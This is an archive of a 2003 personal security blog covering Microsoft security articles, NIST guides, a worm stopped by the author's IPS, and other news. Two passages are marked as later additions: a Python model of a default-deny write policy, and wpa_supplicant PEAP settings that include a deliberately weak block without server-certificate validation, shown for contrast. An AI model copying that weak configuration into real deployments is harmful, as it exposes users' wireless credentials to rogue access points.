October 31, 2003
Windows Services for Unix
Have you been on a Windows machine and wished you had your favorite Unix tools, and don't want to install cygwin?
Consider checking out Microsoft's Windows Services for Unix. I was surprised to find out that it won the Open Source Product Excellence Award for Best System Integration Software at the LinuxWorld Conference & Expo. That's right, a penguin gave a bear an award.
Personally I really like cygwin, but I never knew this even existed. I will have to take a look and see how well integrated it is. Having clean NFS support to my Linux and BSD boxes could be very useful without the hacks I have had to do as of late. Then again Samba 3.0 works just great on the Windows side of things.
Anyways, if you are finding yourself more and more using Windows and need your Unix tools, here you go.
Posted by SilverStr at 10:52 AM
October 30, 2003
Standardizing Authentication Using the Security Assertion Markup Language (SAML)
Security Pipeline published an article on how to use Security Assertion Markup Language (SAML) to provide authentication. It's a pretty good read, even if you are not an XML/SAML demi-god.
I still think there needs to be vendor buy-in for this. Standardizing a markup language which is fragmented will not help the industry at all. Everyone has to get together and agree to this thing. Course, the same could be said of the HTML standard *lol*
Posted by SilverStr at 10:09 AM
October 28, 2003
Carnivore DCSNet running over Sprint's network
Well, according to an article at Government Computer News the FBI has signed onto Sprint Corp.'s Peerless IP fiber network, which operates independently of the public Internet.
Why? So they can provide secure VPN to over 59 undisclosed locations which are running DCSNet (formerly called Carnivore until it was beaten to death in the media). DCSNet's purpose is surveillance of phone call detail and content traced by law enforcement. It also extends surveillance to e-mail communications.
Big brother is watching. Let the conspiracy theories commence!
Posted by SilverStr at 01:24 AM
October 27, 2003
NSA Cisco Router Security Guidelines
If you liked the NSA Security Guidelines I recommended for Windows way back in May and wished they had similar documents for your network hardware, fear not! Today the NSA released the National Security Agency Security Recommendation Guides for Cisco Routers.
If you've got Cisco gear, you may want to read up on this.
Posted by SilverStr at 05:23 PM
Next-Generation Secure Computing Base (NGSCB)
Just finished reading an interesting article by Microsoft entitled Next-Generation Secure Computing Base: Development Considerations for Nexus Computing Agents.
In it Microsoft talks about a new system of separating code into trusted and normal modes, which they refer to as Nexus Mode and Standard Mode. In Standard Mode, nothing really changes... the Windows kernel uses its existing system to maintain operations. However, when in Nexus Mode, there is a better level of assurance when it comes to secure input/output, protected memory, sealed storage (great for storing keys) and attestation.
By writing Nexus Computing Agents (NCA), a developer could provide a more trusted environment through the Nexus Security Kernel than that of the standard Windows kernel, which has become very brittle over time. The result is an innovative platform that provides a more secure and trustworthy computing environment to Microsoft Windows users.
Not sure what to make of it. I hope that they will be giving me access to this at the DevCon at the Microsoft campus next month, so I can understand it better myself.
Any way you look at it, it's something interesting to read. Happy reading.
Posted by SilverStr at 01:01 PM
October 26, 2003
The Anatomy of a Bug
I just finished reading a blog entry by a Microsoft tester on the anatomy of a bug. It's really interesting to hear how a really small and silly bug can balloon into a testing nightmare.
As I was reading it I was saying to myself: "Developer did a naughty thing and trusted a foreign key location that he doesn't control. Easy fix: recreate the key each time the key could be used, and fail cleanly if perms do not permit that."
Well, that ended up being the fix, but I never fathomed the amount of testing around the fix that would be needed. Especially when it has to be translated into 20 languages. Man, i18n is a pain.
Well worth the read, even only to glimpse at the testing required to fix a bug at Microsoft.
Posted by SilverStr at 08:33 AM
Threat Modeling for Drivers
I found a good paper on threat modeling device drivers for Windows. If, like me, you spend a lot of time writing kernel-mode code for Windows, it is important that you read this paper.
It covers STRIDE modeling right up to DREAD analysis. I really appreciate publications like this coming out of Microsoft. Thanks.
Happy reading.
Posted by SilverStr at 12:10 AM
October 25, 2003
Secure Coding Techniques - Validating User Input
David Wheeler (of Unix Secure Programming HOWTO fame) published a secure programming article this week on validating input.
The presentation I give to the local universities on secure coding techniques is pretty much what David is talking about here. You cannot trust data moving between untrusted boundaries such as the user input and trusted boundaries in your code. You must validate all user input.
More to the point, you should consider all input suspicious until proven otherwise. This means you don't validate and check for WRONG data; you only accept data that is formatted correctly. Everything else is denied!
Any way you look at it, it is always good to remember this technique. David does that well in this article.
Happy reading.
Posted by SilverStr at 04:25 AM
Obfuscating C# to Thwart Reverse Engineering
Microsoft released another good article (that's three in one day!) on obfuscating your code to prevent reverse engineering. This has been a problem that has plagued me in Java for years (although the obfuscators were getting better).
If you don't know, obfuscation is a technique that provides for seamless renaming of symbols in assemblies as well as other tricks to foil decompilers. When it is properly applied, obfuscation can increase the protection against decompilation by many orders of magnitude, while leaving the application intact. Obfuscation is commonly used in Java environments and for years has been helping companies protect the intellectual property in their Java-based products.
Read this article to learn how it can be done for your C# apps.
Posted by SilverStr at 04:17 AM
Keeping Your Data Secure with AES
Microsoft released an interesting article on using the new AES standard within C# under .NET.
This article even includes some significant information on the algorithm itself, and how it's implemented within the .NET architecture. It also includes a full example on encrypting and decrypting .NET data!
Nice little article to add to your arsenal if you are working on .NET.
Posted by SilverStr at 04:12 AM
Expert Tips for Finding Security Defects in Your Code
Michael Howard released a new article for Microsoft on how to review and audit your code to find security defects.
If you have read some of his previous writings (like one of my favorite books, "Writing Secure Code") you won't find anything new here. But for a lot of you, this is a great topic to continue to read up on. It never hurts to be reinforced with the same useful information.
Happy reading.
Posted by SilverStr at 04:07 AM
October 24, 2003
Flea: New Email Virus tried to attack me
Well, apparently there is a new worm out there called Flea. This little sucker can execute automatically when users open HTML-formatted emails in Microsoft Outlook or Outlook Express. Unlike most Windows nasties, the bug does not depend on a user opening an infectious file to do its mischief, and guess what... I almost infected myself.
I say almost, because a funny thing happened. My latest work with my Intrusion Prevention System (IPS) that provides mandatory access control included a new feature this week. I added the ability to shield the 'Windows base install directory' from untrusted access. This was accomplished by setting a security policy which allows read and execute access to the systemroot directory (normally C:\Windows in XP) and all its subdirs, but prompts the administrator with a default DENY if anyone attempts to write or delete anything in the Windows directory, unless it's Windows Update.
Well guess what? This morning in my inbox was a seemingly harmless message that passed my SpamAssassin server filter and my host-based anti-virus scanner. When I clicked on it I was prompted by my IPS code that there was an attempt to write to the Windows directory, something I know I didn't ask for. I clicked the "Deny Access" button and the attack ended. It hence stopped the propagation dead in its tracks, and the 'Flea' was dead.
I am kinda happy I added that feature this week. It has already paid for itself by protecting me. The anti-virus product I use from NAI didn't have a signature for this beast. And there lies the problem with all such products, not just NAI. Signature-based policy enforcement alone is not enough. Strong security policies which use anomaly detection with least privilege go a lot further.
In my case, I was protected from this unknown threat because I had already determined that there is no reason for anyone or anything to write to the Windows base system unless it is Windows Update itself. (Well, to be honest there are some other policies as well to allow logging etc., but that is out of scope of what we are talking about.) In applying this policy, it doesn't matter if a new strain of this attack occurs. Its propagation is revoked because it goes against the nature of the policy defined.
Man what a neat way to see my code work in action when I wasn't expecting it! Good way to end a great coding week!
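As an added illustration (not the author's IPS or driver code), here is a small Python model of the policy described above: read and execute under the system root are allowed, any write or delete under it prompts with a default deny unless the caller is the trusted updater, and everything outside the root is out of scope. The system root, the updater's image path and the sample access events are assumptions constructed for the example.

```python
"""Model of a path-scoped least-privilege write policy like the one in the post.
Constructed illustration; not the author's driver or C# code."""
from dataclasses import dataclass
import ntpath

SYSTEM_ROOT = r"C:\Windows"                                # assumed XP default %SystemRoot%
TRUSTED_WRITERS = {r"C:\Windows\System32\wuauclt.exe"}     # assumed Windows Update agent path
READ_OPS = {"read", "execute"}
WRITE_OPS = {"write", "delete", "create", "rename"}


@dataclass(frozen=True)
class FileAccess:
    process: str   # image path of the process making the request
    op: str        # read / execute / write / delete / ...
    path: str      # target file path


def _norm(p: str) -> str:
    # Windows paths are case-insensitive; collapse '..', '.', and mixed separators
    # so that a cleverly written path cannot slip past the prefix check.
    return ntpath.normcase(ntpath.normpath(p))


def under_root(path: str, root: str = SYSTEM_ROOT) -> bool:
    """True if path is the root itself or a descendant of it.
    A sibling such as C:\\Windows2 or C:\\Windowsfoo must NOT match."""
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r + ntpath.sep)


def decide(ev: FileAccess) -> str:
    """Policy decision for one access event: 'allow', 'prompt' or 'deny'."""
    if not under_root(ev.path):
        return "allow"                  # policy is scoped to the system root only
    if ev.op in READ_OPS:
        return "allow"                  # read/execute of the base install is fine
    if ev.op in WRITE_OPS:
        trusted = {_norm(t) for t in TRUSTED_WRITERS}
        if _norm(ev.process) in trusted:
            return "allow"              # the updater is the one sanctioned writer
        return "prompt"                 # ask the administrator, default deny
    return "prompt"                     # unknown operation: fail closed


def apply_policy(events, admin_answers=None):
    """Run events through the policy. A 'prompt' is resolved with the
    administrator's answer for that path, defaulting to 'deny' (the
    behaviour that stopped the worm). Returns [(event, final_decision)]."""
    admin_answers = admin_answers or {}
    out = []
    for ev in events:
        d = decide(ev)
        if d == "prompt":
            d = admin_answers.get(ev.path, "deny")
        out.append((ev, d))
    return out


# Constructed sample events; file names are placeholders, not real indicators.
SAMPLE_EVENTS = [
    FileAccess(r"C:\Program Files\Outlook\outlook.exe", "read",   r"C:\Windows\System32\mshtml.dll"),
    FileAccess(r"C:\Program Files\Outlook\outlook.exe", "write",  r"C:\Windows\dropped.exe"),
    FileAccess(r"C:\Windows\System32\wuauclt.exe",      "write",  r"C:\Windows\System32\patched.dll"),
    FileAccess(r"C:\notepad.exe",                       "write",  r"C:\Windows2\notes.txt"),
    FileAccess(r"C:\x.exe",                             "delete", r"c:/windows/../windows/system32/drivers/x.sys"),
]

if __name__ == "__main__":
    for ev, d in apply_policy(SAMPLE_EVENTS):
        print(f"{d:6} {ev.op:7} {ev.process} -> {ev.path}")
```

Note that the mail client's write to the system root is blocked without any signature for the worm; only the policy decides.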
Posted by SilverStr at 11:45 AM
October 23, 2003
Troubleshooting Internet Connection Firewall on Windows® XP
Today Microsoft released a nice Troubleshooting Internet Connection Firewall on Microsoft® Windows® XP document that steps you through the proper configuration of the ICF.
If you are running or administering Windows XP or higher, you should probably download this document and ensure that you have configured your firewall correctly. (Assuming, of course, that you are using ICF and not some other personal firewall.)
Happy reading.
Posted by SilverStr at 05:52 PM
Microsoft talks about Internet security
There was an interesting article I read this morning in which Bob Muglia (Senior VP at Microsoft) is interviewed by C|NET News on Internet Security.
It is always interesting to listen to various people at Microsoft speak about security. They all have the same message, but with different undertones. Nothing really new in the interview, but it was interesting how Bob explained the "shield" Ballmer talked about last week.
Enjoy.
Posted by SilverStr at 10:36 AM
User Interaction Design for Secure Systems
Following up on my previous post about Secure Interaction Design, I found Ka-Ping Yee's paper on User Interaction Design for Secure Systems worth the read.
The security of any computer system that is configured or operated by human beings critically depends on the information conveyed by the user interface, the decisions of the users, and the interpretation of their actions. This paper establishes some starting points for reasoning about security from a user-centred point of view: it proposes to model systems in terms of actors and actions, and introduces the concept of the subjective actor-ability state.
If you are interested in understanding this model of thinking as it relates to the user experience in secure systems, it is well worth your time to check this out.
Happy reading.
Posted by SilverStr at 10:18 AM
Secure Interaction Design
Recently Brian was commenting on User Interface Guidelines and provided some useful links to the guidelines for different platforms. With the recent iTunes now available in Windows, it was funny to see Apple guidelines applied to a Windows platform.
What interested me was not the guidelines themselves, but how devoid they were of any discussion of security aspects with respect to the UI. Now before you jump down my throat and quote Microsoft's own Steve Lipner and say "Usability, flexibility, security are a set of trade-offs", I would like to alter your thinking and dispute that by saying that "usability and security aren't contrary goals; we shouldn't assume that we must sacrifice one for the sake of the other".
In fact, a system that's hard to understand and use will almost certainly have security problems in practice. And a more secure system is a more reliable, more effective system: hence, a more usable system. Here's a definition from Garfinkel and Spafford's book, Practical UNIX and Internet Security:
"A computer is secure if you can depend on it and its software to behave as you expect."
Doesn't that look like it would be good for usability, too?
Now, I wish I could take credit for this thinking. But I cannot. The last paragraph is actually a quote from Ka-Ping Yee, who has devoted time to develop a site in relation to Secure Interaction Design. In it, he points to various papers that support his argument, and comes to suggest a list of ten principles for secure interaction design:
- Path of Least Resistance. The most natural way to do any task should also be the most secure way.
- Appropriate Boundaries. The interface should expose, and the system should enforce, distinctions between objects and between actions along boundaries that matter to the user.
- Explicit Authorization. A user's authorities must only be provided to other actors as a result of an explicit user action that is understood to imply granting.
- Visibility. The interface should allow the user to easily review any active actors and authority relationships that would affect security-relevant decisions.
- Revocability. The interface should allow the user to easily revoke authorities that the user has granted, wherever revocation is possible.
- Expected Ability. The interface must not give the user the impression that it is possible to do something that cannot actually be done.
- Trusted Path. The interface must provide an unspoofable and faithful communication channel between the user and any entity trusted to manipulate authorities on the user's behalf.
- Identifiability. The interface should enforce that distinct objects and distinct actions have unspoofably identifiable and distinguishable representations.
- Expressiveness. The interface should provide enough expressive power (a) to describe a safe security policy without undue difficulty; and (b) to allow users to express security policies in terms that fit their goals.
- Clarity. The effect of any security-relevant action must be clearly apparent to the user before the action is taken.
Further to this, he has created an excellent poster that now hangs on my wall which reflects these principles. It looks something like this:

If you are interested in usability in software, while at the same time achieving your security goals, consider browsing this site on Secure Interaction Design. It's well worth the effort.
Posted by SilverStr at 09:58 AM
October 21, 2003
Ballmer says Linux not accountable for security
According to Steve Ballmer, the rivalry between Microsoft Windows and Linux comes down to the basic question of whom customers should trust.
There is an article in which Mr. Ballmer says that "There's no roadmap for Linux. Nobody is held accountable for security problems with Linux."
I do not see how the open development process of Linux equates to the fact we should blindly trust Microsoft. There is a definitive path for kernel development, just as there is for Windows. And, does this mean we can now hold Microsoft accountable because Steve says we can? If so, I would like to know who to send the bill to for all the overtime InfoSec people are putting in cleaning up the mess of the recent months.
Anyways, I don't have enough time in the day to criticize such erroneous thinking. I think Mr. Ballmer needs a tutorial on Crystal Box security vs. Black Box security thinking, and then equate the word "TRUST" accordingly.
You should read the article yourself. Ballmer makes the Microsoft position that they should be trusted because they have the infrastructure to properly address security patches. This is the SAME infrastructure that released the ORIGINAL code that had security issues, and the SAME infrastructure that did the "amazing code audit" as part of their Trustworthy Computing Initiative.
Should we trust this SAME infrastructure? No, I think not. Want to earn my trust Microsoft? How about taking these actions:
- Perform a 3rd Party Code Audit from an UNBIASED source. Do not pick vendors who are loyal to you and would rather FIRE an honest report rather than accept it.
- Stop all new development and refactor the brittleness in your existing systems. We have to wait until 2006-2007 for Longhorn server. Why not invest 6 months bringing the NT core up to date, which your own teams at Microsoft admit was not designed with Secure Coding Principles in mind? You would strengthen your system exponentially and can carry it on for use in Longhorn.
- Provide an integrated patch management system that works with not only your OS, but the applications on the same platform.
- Release a public API for this patch management system so other vendors can use the same infrastructure. Consider looking at how well Debian's apt-get works. A customer could simply add another vendor's "server" to the list of server sources and get updated with dependencies on the fly.
Take these steps and I will begin to consider trusting you more openly.
P.S. In all fairness, Microsoft IS getting better. But this is the type of thing where "Trust, but Verify" is in order. Blind trust is NOT an option yet.
Posted by SilverStr at 01:45 PM
Security Considerations in SDLC
Today I stumbled upon an interesting gem published by NIST this month as Publication 800-64. This paper is entitled Security Considerations in the Information System Development Life Cycle, and is work in which the National Institute of Standards and Technology makes recommendations on a framework that incorporates security in all phases of the system development life cycle (SDLC).
I haven't had a chance to completely read through it in depth, but from my first reading it seems well thought out and provides good guidelines for any project that should include security during the early stages of design, rather than later on in the implementation/operational stages of deployment. (Well, to be honest, this should ALWAYS be the case anyways, since it's much more expensive to bolt on a hacked security solution after the fact.)
Happy reading!
Posted by SilverStr at 10:25 AM
October 20, 2003
War Nibbling: Bluetooth Insecurity
Today I had a chance to read an interesting paper on the insecurities of Bluetooth. @stake published a paper called War Nibbling: Bluetooth Insecurity which goes into detail discussing the protocol's design and implementation flaws. Well worth the read in itself.
On top of that, today they released Redfang - The Bluetooth Hunter, an information-gathering tool which exploits the weaknesses found in their paper.
Interesting stuff. Happy reading!
Posted by SilverStr at 11:55 AM
Yet another Linux distro for InfoSec Pros
In my opinion, one of Linux's most powerful attributes is one of its worst failures. Everyone shouts out that "choices" are good. And to a point, I agree with that. But today I learned on freshmeat that there is yet ANOTHER Linux bootable CD distro focused on Information Security Professionals called L.A.S.
I do not mean to criticize L.A.S. as I haven't tried it, but I don't need to. From their own admissions, it's based on Knoppix. *sigh* So why not help out the Knoppix-STD project that's been around for a while! This is one of the falling graces of Linux. Everyone wants to build their own tools instead of getting together, consolidating talent and making a kick-ass product. The Knoppix "Security Tools Distribution" is something I have talked about before, and is something I enjoy using. More to the point, it is exactly what InfoSec personnel need in their toolkits. The effort that could go into making it better (like better audit reporting facilities for forensic purposes etc.) would be way more productive than patching together yet another distro.
But I digress. If you want to try 'yet another distro' for InfoSec purposes, consider seeing if L.A.S. is to your liking.
Posted by SilverStr at 08:39 AM
October 18, 2003
Characterizing the Performance of NIDS
I just finished reading an interesting paper in which the authors measure and compare two major components of the Network Intrusion Detection System (NIDS) processing cost on a number of diverse systems to pinpoint performance bottlenecks and to determine the impact of operating system and architecture differences.
Surprisingly, the results show that even on moderate-speed networks, many systems are inadequate as NIDS platforms. You should read it for yourself to make your own interpretation.
Happy reading.
Posted by SilverStr at 11:56 AM
October 17, 2003
A+ on Microsoft's Report Card
Recently Scoble was giving Microsoft a report card on how they were doing. It is easy to criticize Microsoft due to its very size, and the fact we have had to put up with a lot of crap over the past few years as they dominated our lives.
What was funnier was that the last time I saw Scoble, I discussed how I didn't feel Microsoft was small-ISV friendly, as I couldn't afford to buy all the software to run a Microsoft shop. Which was and is why I run Linux on all our servers.
But today I want to give Microsoft some praise. More to the point, I would like to give Microsoft an A+ on working with small ISV like me. And I don't say that lightly. I mean it. Today I am impressed with something I heard about Microsoft's outreach to small ISVs like me.
You see, I complained a while ago about how expensive it was to tool up to do Windows kernel-mode development. I was spoiled on all the free tools I have used on Linux and Unix environments for the past 7 years and forgot how much tools on Microsoft platforms cost. I spent thousands of dollars on new development tools (DDK, IFS Kit, Visual Studio etc. etc.) and easily spent enough money that I could have bought a good used car so I could deliver pizza or something.
Well, today Joel on Software posted something that made my head spin around. After calling my Microsoft rep to check in about this I now retract my comments and would like to apologize to Microsoft, at least to a limited degree. I think they were wrong in selling me stuff when they knew this program existed. Or at least this information should be more readily available so more people might transition back from a Unix world to the Windows world for development.
What am I talking about? I am talking about the Empower Program for ISV that Joel talked about today. For $795 US I am going to be getting:
- 5 copies of MSDN Universal (which includes basically everything a dev needs)
- 5 copies of Windows XP Pro
- 5 copies of Office XP
I am also getting a software license with 5 Client Access Licenses (CALS) for:
- Microsoft Windows Server 2003
- Microsoft Exchange 2000 Server
- Microsoft SQL Server™ 2000
- Microsoft SharePoint™ Portal Server
Kudos to Microsoft on such a program. And thanks to Joel for pointing it out to me. Only wish Scoble would have known this so he could have told me before I sunk cash into everything else.
Posted by SilverStr at 01:46 PM
October 16, 2003
NIST releases Guidelines on Network Security Testing
Today NIST released Special Publication 800-42, Guidelines on Network Security Testing.
It's a thorough document to say the least. Well written though, as should be expected of NIST. The guide stresses the need for an effective security testing program within federal agencies, and goes in detail on how to do so.
I like reading resources like this. I hope you like it. Happy reading.
Posted by SilverStr at 10:57 AM
Microsoft's IT Pro Security Zone
By way of Scoble I found out that Microsoft has launched the IT Pro Security Zone. It's a site to get answers to your security questions and connect with your community. You can find dynamically generated links to the most active security newsgroups, discussion topics, and KB articles. You can also find the latest security updates, downloads, FAQs, and articles from MVPs just waiting to help.
I think this is a pretty good resource to have on hand if you are administering a Windows environment.
Enjoy.
Posted by SilverStr at 09:19 AM
October 15, 2003
PDC Security Symposium
OK, now I am vexed. I decided not to go to the PDC because I wasn't all that interested in learning about Longhorn, especially since it's at least 3 years away. The information on the tracks had very little to do with security, and I thought nothing of it.
Today I get an update from MSDN telling me there is now a Security Symposium which would have been right up my alley. And guess what... the PDC is sold out. :(
Grrrrrrrrr. Well, that's OK. I am looking forward more to the DevCon Microsoft is hosting on campus in November. That should be a pretty good conference with lots of good security tracks. I am hoping to make that one. So, if you are in the Seattle area I will probably be found in Building 33 during the conference, and in the evenings free to partake in Seattle's goodness. I know I am going out with Scoble a bit, and hope to catch a beer with Michael Howard, but short of that... pretty available in the evenings. Drop me a line if you're interested.
Posted by SilverStr at 01:25 PM
10 steps to a successful security policy
ComputerWorld has an article which discusses 10 steps to a successful security policy.
Nothing really new here, but a good primer for those who don't know how to do it. And you really should be doing this.
Happy reading.
Posted by SilverStr at 01:12 PM
Remote Debugging over DCOM
Well, I have been hung up for over a week with a weird bug in one of my C# apps. What made it even more difficult to track down was that I had to run it in a VMware session because it is unstable and does nasty things to the system due to its interaction with my kernel-mode driver. (Can you say corrupt the system when you hit a single button... a script kiddie paradise... weeeeeeeeeeee)
Well, the solution was to use remote debugging. Sounds easy enough. Ya, right.
The idea of remote debugging is sound. I use remote debugging over serial... well, a named pipe actually, pretending to be a COM port with VMware. You can see my HOWTO on that over here. This works great and I have been doing this sort of debugging for over six months now.
So what harm could there be in also remote debugging my application?
Well, now that was a pickle. I read every document on MSDN, in the Help docs and through newsgroups. All I had to do was install Remote Debugging Components within the VMware session and it should work fine. NOT.
Tried asking around on IRC and Usenet. I am told to use TCP/IP debugging. After spending a few hours looking at how to do this and trying to set it up, I find out it only works for native C/C++ code, and will not work with stand-alone C# apps. Grrrrrrrr. Waste more time putting everything back the way it was.
Finally I figure I am going to bite the bullet and just install Visual Studio in VMware and debug it locally. Of course that fails twice (stupid autorun on my host machine STILL runs after I set AutoRun to 0 in the registry). In desperation I step back and decide to rethink my strategy. I have wasted a week trying to get this working, and nothing is helping.
After spending most of last night googling every combination I could think of for "remote debugging C# application" I found the jewel that saved my life. I found a document over at gotdotnet.com that was written by Min Kwan Park, a guy within the Microsoft CSharp Debugger QA team. The topic of the document? "The VS7 Debugger doesn’t work. What can I do?". No way. This can't be. Sure enough the answer sits in the last few paragraphs of the document.
On XP Pro, because of the default security setting for "sharing and security model for local accounts", this remote debugging is not allowed by default.
GRRRRRRRRRRRRRRRRRRRRRRRR. It's an undocumented setting that has to be changed for remote debugging to work! Well, to be fair, I guess it was documented in this jewel, but it wasn't found during the last week of searching on MSDN, the VS help docs or even the newsgroups.
So now everything is working great. With my multiple monitors I have one hosting my remote debug session of my kernel driver with WinDbg and the other hosting my remote debug session of my C# app in the Visual Studio .NET debugger. 2 minutes later I found my bug. (And god, what a dumb bug it was.)
*sigh*
Posted by SilverStr at 10:16 AM
October 14, 2003
Celldar - The next radar?
BusinessWeek reports on a new technology that uses ubiquitous cell-phone signals to create cost-effective radar through cell towers!
This is a really kewl approach to the radar issue. Because it's a passive system (there is no transmitter, only a receiver) you could not actually pinpoint the location of the Celldar station, rendering it invisible to you... but allowing it to see everything.
It sounds exciting. You can use all the cell towers around the country to map out movement of virtually anything, or anyone. (Uh oh... the privacy people are gonna go nuts.) An interesting tangent from this is that Lockheed-Martin is building a system using FM radio and TV signals to do the same thing. With these signals being much stronger, they can actually passive-radar as far as 135 miles away. They call the technology Silent Sentry, and I can see why. And the kicker: instead of spending $20-$30 million on a radar system, these things can be made for like $20,000. HUGE savings that can be passed on to the right people. Imagine every airport now having radar! (Most don't, you know.)
This has to make you think though. If you can triangulate a cell signal from 3 towers, and then lock onto the user holding the phone, you could "mark" him and then use the software in celldar to track him. Go ahead Osama, make that next phone call!
Fiction becoming reality? We will have to see.
Posted by SilverStr at 05:10 PM
My Latest installation eXPerience
Today was the day of the turkey. Thanksgiving feast for us all. Or so I thought.
While visiting family for the holiday I helped my mother-in-law get her computer fixed up. She has an old HP Pavilion 6640C with 64 megs of RAM, and wanted to get her computer to go faster. She bought some goodies (256 megs of RAM and a new OS) and had them waiting for me when I arrived for Thanksgiving dinner.
No worries I thought to myself. This should be a piece of cake (or pumpkin pie as it were)
6 hours later, I finally finished up the hell that was to be known as this year's Thanksgiving feast.
Oh, this wasn't like any installation I had before. I was expecting this install to be easy. I even brought a CD with XPSP1 on it knowing I would need to do some patching. But I never realized how much patching I had to do.
It all started with the switch from Windows 98 to XP Pro. It seems HP will not support such an upgrade, because it was never tested in their lab. They would prefer that you buy a new machine. Umm... no. Not gonna happen. They use their computer to surf the net and do the occasional email, which they even use on a browser via Hotmail.
My first install of XP failed. BIOS incompatibilities. No ACPI support. OK, that sucks. Need to find a new BIOS. None exist. Google. Lots of complaints, but no solution for an updated BIOS. HP won't release an updated BIOS. OK, fine. Figure out how to get around ACPI. Ahh, Microsoft has an undocumented secret key to do just that. Hit F7 as soon as the Windows Setup starts, and it toggles ACPI support. Guess I hit it one too many times as I toggled it off and back on. Install failed. Realize that I must have hit F7 twice, and reinstall again. Ahhh... worked this time.
Now, this 6640C is pretty slow compared to what I normally use. The install took over an hour. Half way through an error occurs and COM+ can not be registered. Damn. Dinner time.
[Rush through my dinner in no time fast, not getting a chance to really ENJOY the festivities]
Ok back. Install still hooped. Reboot. XP recovers nicely and continues on, only backtracking part of the install. Install completes and I am thinking the rough stuff is over. Dumb assumption on my part.
So after reboot I set up the accounts, and throw in my XPSP1 CD I burned. I thought I was being smart because I thought ahead to download the huge (120+ Meg) service pack and wasn't looking forward to downloading something like that with a modem. I start the upgrade, minding my own business and reading more of the book I took along (Beyond Fear from Bruce Schneier. My second reading of it. Good book).
At about 90% complete something weird happens. A dialog pops up and says some RPC services are corrupt and are shutting down. A few more errors occur and I realize that I just got nailed with a RPC/DCOM attack. How the hell? Oh crap, there is a DSL modem on the floor. Parents upgraded to broadband and I forgot about that. The damn XP default network setup configured itself and Telus had this completely unprotected and exposed XP box for the glorious scriptkiddies to nail. And they did. Oh yaah... now I gotta friggin patch an exploited box.
Well, luck be a lady.. the service pack was installing and had an exclusive handle to some of the files.. the exploit didn't actually attach itself to much. And with nothing configured or installed yet... the malicious code had nothing left to propagate with. Oh thank heavens, I was not wanting to reinstall XP again.
So after I reboot (no choice, basic Windows services died when the penetration happened and COM services were toasted) I unplug the DSL modem and let the service pack install. While it's installing I clean up the residue from the attack, set up the XP firewall and prepare to plug this thing back into the Net. (At this point it's a 'thing' now... it lost the honor of being a computer as I now regret agreeing to fix it during a fantastic Thanksgiving feast)
So I go to do a Windows Update. 27 critical security patches that are over 38 megs. Well, at least there is broadband now, so that shouldn't take long. *sigh*
The download did indeed come down lightning fast. But then the patching started. This is where life became fun. It took over 3 hours for the 27 patches to get applied. I could do nothing... it just went on its way with the hard drive writing like mad and the CPU crying for some free cycles. Just when I thought it was freezing up, another HD write would occur and I realized this little machine was doing its best to keep up.
Finally contented with a 3 hour 'Windows Update' (and the luxury of looking through my wife's family photo albums for the 3 hours) I finally was prompted for a reboot.
The restart was agonizing. It chugged and churned and I was sure the thing was hooped. 5 minutes later, somehow, somewhere the gods looked down and said "that's enough pain for Dana, he can have more torture tomorrow when he needs to fix DCOM remote debugging issues on his own box". It came up. And it was good. It was FASTER than Win98. It was prettier. And it was now 11:30. Time to go home, and eat leftovers from the feast.
Moral of the story? I dunno, pick from the many veins this can be read from in this eXPerience. I look at this as a positive experience though. I again am taught about the fallacies of human beings and the false sense of security I thought I had during the install. (Thanks script kiddie) I am so used to flawless XP installs on my machines in a 'clean room' that is properly firewalled and segmented off so I can go to town upgrading quickly. I also got another side benefit. I am trying to lose weight anyways, so I didn't have time to gorge on all the yummy food! Of course, just thinking about it has me hungry so I think I will go make myself a small plate and head to bed.
Hey, I hope your Thanksgiving was better than mine. If you haven't had Thanksgiving yet, remember not to get roped into fixing the in-laws' computer during the upcoming dinner!
Posted by SilverStr at 12:53 AM | Comments (6) | TrackBack
October 13, 2003
It's Official: No Longhorn Until 2006
Microsoft Watch reports that at Microsoft's worldwide partner conference this week, Microsoft finally admitted that Longhorn won't see the light of day until 2006.
What saddens me is that this means the Longhorn SERVER won't be out until sometime in 2007. Wow, that seems like a long way off to wait for the next server platform release, which will include all the new security tidbits that the Longhorn project is keeping under lock and key.
Also makes you wonder how good the PDC will be. If they are waiting 3 more years before Longhorn's release, shouldn't they have waited a year or so before announcing things, since 3 years is a PRETTY LONG TIME in Internet time?
Posted by SilverStr at 03:54 PM | Comments (2) | TrackBack
T-Mobile to use PEAP for Secure 802.11 Auth
The Seattle Times reports that T-Mobile is going to roll out 802.1x authentication using secure EAP (actually they will use Protected EAP, better known as PEAP).
Early in the new year, Windows XP users will be able to get a patch from Microsoft which includes 'Wireless Provision Services', giving each of them their own separately encrypted local channel. This is exciting as it means that customers with the right software and without VPN access suddenly have a very high degree of local link security and integrity.
I like the idea of Hotspots. And I like how T-Mobile is approaching it. I wish them great success!
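What PEAP buys you depends on the client actually validating the authentication server before it hands over credentials inside the TLS tunnel. The fragment below is an added illustration, not T-Mobile's or Microsoft's configuration; it is written as a wpa_supplicant network block because that is the most compact way to show the setting. The SSID, identity, password and certificate path are placeholders. The first block is the weak form shown only for contrast; the second is the one to use.

```conf
# Added example, not from the original post. All values are placeholders.

# WEAK: PEAP with no ca_cert. The supplicant will build its TLS tunnel to
# whatever RADIUS server answers, so the MSCHAPv2 exchange inside the
# tunnel is exposed to any access point broadcasting the same SSID.
network={
    ssid="hotspot-example"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.com"
    password="PLACEHOLDER"
    phase2="auth=MSCHAPV2"
}

# CORRECTED: pin the CA that issued the operator's authentication server
# certificate and require the server name to match, so the tunnel (and the
# credentials inside it) only ever go to the operator's RADIUS server.
# anonymous_identity keeps the real username out of the cleartext outer EAP.
network={
    ssid="hotspot-example"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.com"
    anonymous_identity="anonymous@example.com"
    password="PLACEHOLDER"
    ca_cert="/etc/ssl/certs/hotspot-ca.pem"
    domain_suffix_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}
```

The same two controls exist in the Windows XP wireless client as "Validate server certificate" and the trusted root CA selection; leaving them unchecked is the equivalent of the first block.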
Posted by SilverStr at 08:18 AM | TrackBack
October 12, 2003
Floating data storage
There has been a long thread on Bugtraq about a paper released called Juggling with packets: floating data storage. In the paper, the authors explore the possibilities of using certain properties of the Internet, or any other large network, to create a reliable, volatile distributed data storage of large capacity.
The idea is that as opposed to traditional methods of parasitic data storage (P2P abuse, open FTP servers, binary Usenet postings), the use of floating data storage 'on the wire' may or may not leave a trail of data. In other words, you could throw your warez in a network stream and never fear getting caught. Turn the power off and it goes away.
